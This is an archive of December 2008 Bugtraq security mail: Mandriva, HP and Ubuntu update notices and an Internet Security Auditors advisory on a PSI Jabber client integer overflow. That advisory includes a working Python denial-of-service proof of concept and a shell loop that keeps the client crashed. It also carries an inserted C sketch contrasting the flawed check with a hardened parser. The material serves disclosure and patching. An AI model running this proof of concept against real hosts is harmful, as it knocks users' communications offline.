 4e93bc7c48ec8f65122d263237b99ec9  corporate/4.0/i586/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm
 f92acdbed4f63778609726eaa2dc8fd1  corporate/4.0/i586/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm 
 35f1b7e0cc1534def4394e7bec95ab48  corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 4e93bc7c48ec8f65122d263237b99ec9  corporate/4.0/x86_64/mailscanner-4.55.9_1-3.1.20060mlcs4.noarch.rpm
 f92acdbed4f63778609726eaa2dc8fd1  corporate/4.0/x86_64/mailscanner-spamassassin-4.55.9_1-3.1.20060mlcs4.noarch.rpm 
 35f1b7e0cc1534def4394e7bec95ab48  corporate/4.0/SRPMS/mailscanner-4.55.9_1-3.1.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJT8jcmqjQ0CJFipgRArRHAKDH4O/m1AfoakbcAK7monhnYH5eywCg8m1k
OPwl0ksaHvGa9rLs78PtnwQ=St+b
-----END PGP SIGNATURE-----

From - Wed Dec 24 16:19:35 2008
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-078
Date: Mon, 22 Dec 2008 16:03:42 -0800
Sender: secure@hpchs.cup.hp.com
Message-Id: <20081223000342.A63ABBE44@hpchs.cup.hp.com>
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01634640
Version: 1

HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-078

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-12-22
Last Updated: 2008-12-22

Potential Security Impact: Please check the table below

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA, please check the table in the Resolution section of this Security Bulletin.

References: MS08-078 (CVE-2008-4844) 

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Storage Management Appliance v2.1 Software running on: 

Storage Management Appliance I 
Storage Management Appliance II 
Storage Management Appliance III 

BACKGROUND

CVSS 2.0 Base Metrics
==============================================
Reference                         Base Vector               Base Score
 --                                Not Applicable                    --
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins.

For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site: http://www.itrc.hp.com/service/cki/secBullArchive.do 


For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146 
For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147 
For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148 
For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140 

The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site: http://www.microsoft.com/technet/security/bulletin/summary.mspx 

Note: The SMA must have all pertinent SMA Service Packs applied 

Windows 2000 Update Rollup 1

Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website: http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManual&lang=en&cc=us&docIndexId9111&taskId1&prodTypeId169&prodSeriesId15667 

Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005 starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already.

RESOLUTION
HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy.

Note: Patch installation instructions are shown at the end of this table. 

 ------------------------------------------------- 
MS Patch - MS08-078 Security Update for Internet Explorer (960714)
Analysis - Possible security issue exists. Patch will run successfully.
Action - For SMA v2.1, customers should download patch from Microsoft and install:
Internet Explorer 6 SP1
Or
Internet Explorer 5.01 SP4
To determine your IE version check the IE help page.
 -------------------------------------------------  

Installation Instructions: (if applicable) 


Download patches to a system other than the SMA 
Copy the patch to a floppy diskette or to a CD 
Execute the patch by using Terminal Services to the SMA or by attaching a keyboard, monitor and mouse to the SMA. 

Note: The Microsoft Windows Installer 3.1 is supported on SMA v2.1. For more information please refer at the following website: http://www.microsoft.com/downloads/details.aspx?FamilyID�9482fc-5f56-4a38-b838-de776fd4138c&hash=SYSSXDF&displaylang=en 


PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 22 December 2008 Initial release 


Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

©Copyright 2008 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSVAMOOAfOvwtKn1ZEQIA8wCgovlmo8AhZWDDRKiRMXE8v10uEpEAmQFP
EhPrwcfBHUfn4xF7TpeRL65i
=SnWJ
-----END PGP SIGNATURE-----

From - Wed Dec 24 16:19:35 2008
Message-ID: <4950C932.7070001@isecauditors.com>
Date: Tue, 23 Dec 2008 12:19:14 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] PSI remote integer overflow DoS
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

============================================
INTERNET SECURITY AUDITORS ALERT 2008-004
- Original release date: 12th December, 2008
- Last revised: 22nd December, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
============================================
I. VULNERABILITY
-------------------------
PSI remote integer overflow DoS

II. BACKGROUND
-------------------------
PSI is a widely used Qt4-based Jabber client, available for Windows,
Mac, Linux, and other operating systems.

III. DESCRIPTION
-------------------------
In order to do file transfers, an open port is needed (by default it is
8010/tcp).

If the first byte of the data stream is 0x05, it means the socks5 option
and we enter the vulnerable zone of the code.

It is possible to satisfy the jump: cmp al, 5  -> je vulnCheck()

The second byte is the amount of bytes to memcpy, but there is a check:

cmp ecx, 10 -> jg goHome()

Well, the signed comparison lets us send negative values: the
accepted range is <= 10 and > 0x7f (it should be compared as unsigned),
so the check can be bypassed with this int overflow. Now we can play
with the 0x80 - 0xff range, and the rest of the stream.

By now we pass successfully the QByteArray.Resize() and
QByteArray.Realloc()

And arrive at the memcpy: from all the data stream sent, n bytes
will be copied, and n is controlled by us :)
The problem in making a heap overflow is that the destination variable
will be resized to n. It is then possible to hang the process, or also
the system, in these two ways:

1. We can send a buffer of only two bytes, \x05\xff; then the memcpy's rep
movz will access a non-paged source, because we didn't send the bytes
we are saying to copy.
2. A very large buffer can be sent to force a large copy of memory.
The system can be saturated.

IV. PROOF OF CONCEPT
-------------------------
#!/usr/bin/python
#by sha0 remote integer overflow DoS  (Linux && windows)
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    sock.connect((sys.argv[1],8010))
except:
    print 'Cannot connect!'
    sys.exit(1)

try:
    sock.send('\x05\xff')
    print 'Crashed!'
except:
    print 'Cannot send!'

sock.close()
#eof

The process can be crashed remotely by:
./PSIcoKiller.py <ip>

PSI down forever:
while [ 1 ]; do ./PSIcoKiller.py <ip> ;done

V. BUSINESS IMPACT
-------------------------
Remote/local Denial of Service of the communications.

VI. SYSTEMS AFFECTED
-------------------------
PSI 0.11, 0.12 and 0.13 (last)
PSI 0.10 not affected
PSI 0.12.1 Solves the problem

Tested in Linux and Windows, but may crash other heap implementations.

VII. SOLUTION
-------------------------
PSI 0.12.1 solves the problem; nevertheless, I suggest filtering this port
whenever possible.
Thanks to kev and infinity for their quick response.

VIII. REFERENCES
-------------------------
http://psi-im.org

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December  12, 2008: Initial release
December  17, 2008: updated with the news that 0.12.1 solves the problem.

XI. DISCLOSURE TIMELINE
-------------------------
November  20, 2008: Vulnerability acquired by
                    Internet Security Auditors
December  02, 2008: Vendor notification
December  12, 2008: Advisory documentation
December  18, 2008: Vendor Release 0.12.1
December  23, 2008: Published

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
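
The following C sketch is an added example, not code from PSI or from the
advisory above. It models the signed length check described in section III
beside an unsigned, bounds-checked parser for the same two-byte header; all
function, enum and macro names are assumptions of this example, and only the
0x05 marker and the limit of 10 come from the advisory.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SOCKS5_VERSION 0x05
#define MAX_COUNT      10   /* limit from the advisory's "cmp ecx, 10" */

enum parse_result {
    PARSE_OK        =  0,
    PARSE_NOT_SOCKS = -1,
    PARSE_TOO_LARGE = -2,
    PARSE_TRUNCATED = -3
};

/*
 * Model of the flawed check: the count byte is sign-extended before it is
 * compared with the limit, so 0x80..0xff become -128..-1 and pass.
 * Returns 1 if the check accepts the header and stores the number of bytes
 * the caller would go on to copy in *requested. Nothing is copied here.
 */
static int flawed_check_accepts(const uint8_t *buf, size_t len,
                                size_t *requested)
{
    if (len < 2 || buf[0] != SOCKS5_VERSION)
        return 0;
    /* Sign-extend the count byte the way a signed load would. */
    int count = buf[1] >= 0x80 ? (int)buf[1] - 256 : (int)buf[1];
    if (count > MAX_COUNT)          /* signed compare */
        return 0;
    *requested = buf[1];
    return 1;
}

/*
 * Hardened parser: the count is treated as unsigned, checked against the
 * limit, and checked against the bytes actually received before copying.
 * out must have room for MAX_COUNT bytes.
 */
static enum parse_result parse_header(const uint8_t *buf, size_t len,
                                      uint8_t *out, size_t *out_len)
{
    if (len < 1)
        return PARSE_TRUNCATED;
    if (buf[0] != SOCKS5_VERSION)
        return PARSE_NOT_SOCKS;
    if (len < 2)
        return PARSE_TRUNCATED;

    size_t count = buf[1];          /* 0..255, never negative */
    if (count > MAX_COUNT)
        return PARSE_TOO_LARGE;
    if (len - 2 < count)            /* sender promised more than it sent */
        return PARSE_TRUNCATED;

    memcpy(out, buf + 2, count);
    *out_len = count;
    return PARSE_OK;
}

int main(void)
{
    /* Constructed sample headers, not captured traffic. */
    static const uint8_t well_formed[] = { 0x05, 0x02, 0x00, 0x02 };
    static const uint8_t high_count[]  = { 0x05, 0xff };
    static const uint8_t short_body[]  = { 0x05, 0x03, 0x00 };
    const struct { const char *name; const uint8_t *p; size_t n; } s[] = {
        { "well_formed", well_formed, sizeof well_formed },
        { "high_count",  high_count,  sizeof high_count  },
        { "short_body",  short_body,  sizeof short_body  },
    };

    for (size_t i = 0; i < sizeof s / sizeof s[0]; i++) {
        uint8_t out[MAX_COUNT];
        size_t out_len = 0, requested = 0;
        int accepted = flawed_check_accepts(s[i].p, s[i].n, &requested);
        int r = parse_header(s[i].p, s[i].n, out, &out_len);
        printf("%-12s flawed_accepts=%d requested=%zu hardened=%d\n",
               s[i].name, accepted, requested, r);
    }
    return 0;
}
```

The hardened parser rejects a count above the limit and also a count larger
than the data received, which is the second condition the flawed check never
tests.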

From - Wed Dec 24 16:29:36 2008
Date: Mon, 22 Dec 2008 23:42:38 -0700
Message-Id: <200812230642.mBN6gcPI020470@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: olga@russkoyepole.ru
To: bugtraq@securityfocus.com
Subject: Re: rPSA-2008-0341-1 dovecot
Status:   

What Dovecot version prior?

From - Wed Dec 24 16:49:35 2008
Date: Tue, 23 Dec 2008 11:57:36 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-677-2] OpenOffice.org Internationalization update
Message-ID: <20081223175736.GB29923@severus.strandboge.com>
Reply-To: Jamie Strandboge <jamie@canonical.com>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="RnlQjJ0d97Da+TV1"
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
Status:   


--RnlQjJ0d97Da+TV1
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-677-2          December 23, 2008
openoffice.org-l10n update
https://launchpad.net/bugs/310359
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  openoffice.org-l10n-af          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ar          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-as-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-be-by       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bg          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-br          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bs          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ca          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-common      1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-cs          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-cy          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-da          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-de          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-dz          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-el          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-en-gb       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-en-za       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-eo          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-es          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-et          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-eu          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fa          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fi          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ga          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-gl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-gu-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-he          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hi-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hu          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-it          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ja          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ka          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-km          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-kn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ko          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ku          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lo          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lt          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lv          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-mk          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ml-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-mr-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nb          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ne          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ns          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-or-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pa-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pt          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pt-br       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ro          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ru          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-rw          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sk          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sl          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ss          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-st          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sv          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sw          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ta-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-te-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tg          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-th          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ti-er       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tn          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tr          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ts          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-uk          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ur-in       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-uz          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ve          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-vi          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-xh          1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zh-cn       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zh-tw       1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zu          1:2.4.1-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-677-1 fixed vulnerabilities in OpenOffice.org. The changes required that
openoffice.org-l10n also be updated for the new version in Ubuntu 8.04 LTS.

Original advisory details:

 Multiple memory overflow flaws were discovered in OpenOffice.org's handling of
 WMF and EMF files. If a user were tricked into opening a specially crafted
 document, a remote attacker might be able to execute arbitrary code with user
 privileges. (CVE-2008-2237, CVE-2008-2238)
 
 Dmitry E. Oboukhov discovered that senddoc, as included in OpenOffice.org,
 created temporary files in an insecure way. Local users could exploit a race
 condition to create or overwrite files with the privileges of the user invoking
 the program. This issue only affected Ubuntu 8.04 LTS. (CVE-2008-4937)


Updated packages for Ubuntu 8.04 LTS:

      Size/MD5:  1341404 f92ae4d4a089c645ad96bf854fad96e4
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-dz_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   422566 d2cab1558467935fa4041b17c5eda9d6
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-el_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   406048 8fecf601bd6bc7cab49da36b35989404
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-en-gb_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1486472 9d2d0bf0468549f0229c513d9854eba3
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-en-za_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   362164 e5ad2e3204f943dfbab2d31615bce425
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-eo_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   379472 7b9cb344dccc0d2a0316db58c9e4fddf
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-es_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1347064 debc61a5ed07d1644cca1355346616ea
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-et_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   378524 45e1d6e858592765571472bc0656dd50
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-eu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   379228 7283da14d737070a4c2b9bab99a80308
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-fa_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   385602 cb4885d70d81e886a3a7bee9aab96eaa
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-fi_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   380232 dd70f444d38e1d3b0362615e41363746
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-fr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1327876 95e07c384ff15d729fc56e170598b1a2
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ga_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   392544 65f3d0b8edb7c9ffb166c91136f13f66
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-gl_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   387184 1ef2fd54517431cf6e927902c87e8219
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-gu-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   408546 43edb4072576b3d0917b78cc086d7baa
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-he_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   387610 756ba0545666b49486d9ab88423c462b
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-hi-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   407616 a5fa51d878f2a72dbbc31250a6e9a4c8
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-hr_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   391410 a86e8f312180b9104b4175405984a1ef
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-hu_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1430760 c7bfede414eaab38111ac7b70f1c77de
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-it_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1348846 76a48856f975dfd869ac7b25a8f88216
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ja_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1413988 c96d7e8f71f32b0d2c53612f6687d5ba
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ka_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   410230 5f2d119a2f75dcd3e78e1f4488ee0e6f
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-km_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1498852 231f5b53845ec639705db2ea6c11626a
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-kn_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   319292 ae93ead691eb7bc6598bd3795d913432
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ko_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:  1324926 6acaf685ed5cecdd07d1f747f11e52a9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ku_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   399414 4bbc26791a7e391c0812b34294abb10c
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-lo_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   399472 e032e76a329e0fb2b6119c6aa92b5e04
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-lt_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   388234 f31ec2fdc0c9e516e138c31c583047c9
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-lv_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   391444 38f39ba11e9b016daf41d43aae854be7
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-mk_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   404582 85f8c386b83c917d011e477d5e8f58be
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ml-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   400196 501fbc0e86b2720e08fc62c649ab0f01
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-mr-in_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   403518 ff771cdaf44295ecc2dbcacacd8d4107
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-nb_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   379982 fcfc2d5cf7d3bea1d51e16f204f89303
    http://security.ubuntu.com/ubuntu/pool/main/o/openoffice.org-l10n/openoffice.org-l10n-ne_2.4.1-1ubuntu2.1_all.deb
      Size/MD5:   403874 d1ae9d4c9133b402b5d43e4640156fef
